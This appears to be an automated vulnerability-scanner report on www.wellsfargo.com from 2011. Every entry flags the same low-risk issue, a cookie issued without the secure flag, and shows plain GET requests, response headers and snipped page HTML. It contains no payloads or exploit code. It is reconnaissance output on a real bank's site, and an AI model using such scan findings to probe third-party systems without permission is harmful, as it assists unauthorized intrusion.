The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/id_credit_protection/idtheft HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Identity Theft Protection - Id ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1727290122.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/hsa/enroll HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 9955 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Health Savings Acc ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2046057226.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/investmentservices/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 8732 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2398378762.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/more HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:51 GMT Content-length: 12093 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2146720522.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/mutual_funds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 12036 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Mutual Fund Center ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1844730634.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-length: 9837 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2331269898.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/openira/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:50 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=YJV8NJhdhdMLGnSv274NzJTQHrvNQ2n3CBLWGMBzrdc8XGhTGsbN!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open an IRA (Individual Retire ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1693735690.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/about/fdic HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:08 GMT Content-length: 9678 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=x1trNJhJGTGqVyL185v7GXzvQBCvYpMvVYwVg3sGTsGMgTVGz2YG!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2448710410.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/applications/inprogress HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:07 GMT Content-length: 4747 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6WsvNJhTXvxJ1jsxDf1m1Gy1rlbWnMwpT7vJFPgxrMwwt58cy9lN!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2398378762.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:05 GMT Content-length: 6663 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LfRNNJhRvn61Cp8bXrFGLwg6QQKWryy89ht4J427MtcBftWn8JsH!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2180274954.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:06 GMT Content-length: 6816 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=L8vkNJhRGXvkQ866j1p1HL661fxkJ10Hh3p3z1R94dLrvJqJY68V!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2079611658.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Location: https://www.wellsfargo.com/locator/ Set-Cookie: ISD_WCM_COOKIE=2079611658.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1777621770.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/preSearch HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-type: text/html Cache-Control: no-cache="Set-Cookie" Location: https://www.wellsfargo.com/locator/atm/search Set-Cookie: wcmcookieloc=NGyJNJhfZkJQBpWrs3zCZbWZdbfpMmq2j01SwVrYQ028TBgjR5nW!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/locator ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2398378762.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /locator/atm/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:17 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookieloc=mdg4NJhdq2DWYbbpdNp9BF000vJcqLG9gHCnvKSjFpn4l8Jr1tl9!898739336; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2163497738.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:41 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9VjQNJhV9tfpnq1TVd2hsJPwPGsqdkCgbFhYGJsJTrttBpTLdsjY!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mortgage/rates?dm=DMIWFHPRAT HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:43 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fZ0GNJhXbp9NkTTBKxLLgWdBC8515ftXhHp83yTlYbMCkvhQHzFT!-1408825807; domain=.wellsfargo.com; path=/; secure Set-Cookie: dm=DMIWFHPRAT; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:43 GMT; path=/ Content-Language: en Set-Cookie: ISD_WCM_COOKIE=1693735690.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1827953418.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online_brokerage/education/trading/volatile/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-type: text/html; charset=ISO-8859-1 Set-Cookie: wcmcookiewf=C7mMNJhJpXQ7FGYBpppzvY2tZP2qr0klzqyBTrZnLhD8HsmsB5nr!-427629300; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1827953418.16927.0000; path=/ Connection: close
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2431933194.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/banking HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:39 GMT Content-length: 10949 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=mFfWNJhTM3LCLw1nwcXCmgZQLT7M2yhK3vfsDDQBTdRL5f6czJbj!1127287699; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2431933194.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Banking Overview</ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2096388874.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /per/more/loans_credit HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:40 GMT Content-length: 10611 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LlvBNJhJC3mhJb9Rgj7RS9w1WVHnp24RLXcRh0pK5HRNch3Gxxnz!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2566150922.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:47 GMT Content-length: 7834 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=S850NJhbvFyXKFsqjRkSJvyZ8MVlMvnnZvZ8BtWvJdLCFxx1ZSxH!-887259216; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2566150922.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head> <title>Wells Fargo - Personal C ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2180274954.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_credit/rate_payments/rate_calc_main HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TC2fNJhcJvc8bQh2DP2GHJBG108y42PYVj4VDGmL2nJ0bZdjh3Lq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo ... Rate & Payment ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2062834442.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7654 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=5MdgNJhLPQJrJbQL2dj2np2B79whD7Gkrq9kkphmPHd9S35MYVGj!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy & Security ...[SNIP]...
